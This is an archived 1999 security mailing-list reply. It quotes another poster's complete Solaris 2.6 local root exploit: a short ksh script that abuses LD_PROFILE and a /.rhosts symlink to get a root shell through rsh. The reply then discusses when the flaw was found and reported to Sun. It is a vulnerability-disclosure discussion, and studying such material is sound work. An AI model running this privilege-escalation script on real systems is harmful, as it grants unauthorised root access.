On Wed, 22 Sep 1999, Steve Mynott wrote: > works on solaris 2.6 sparc anyway... > > #! /bin/ksh > # LD_PROFILE local root exploit for solaris > # steveat_private 19990922 > umask 000 > ln -s /.rhosts /var/tmp/ps.profile > export LD_PROFILE=/usr/bin/ps > /usr/bin/ps > echo + + > /.rhosts > rsh -l root localhost csh -i Old news. I discovered this problem and informed Sun about it in June 1998. I cannot verify it right now but I think they have already made a patch for it. GNU libc 2.something used to be affected as well. The odds are other platforms having this particular nifty feature (if they exist at all) are still vulnerable because I forgot to told Bugtraq about it. Oh, mea culpa! :) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] "Resistance is futile. Open your source code and prepare for assimilation."
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:12 PDT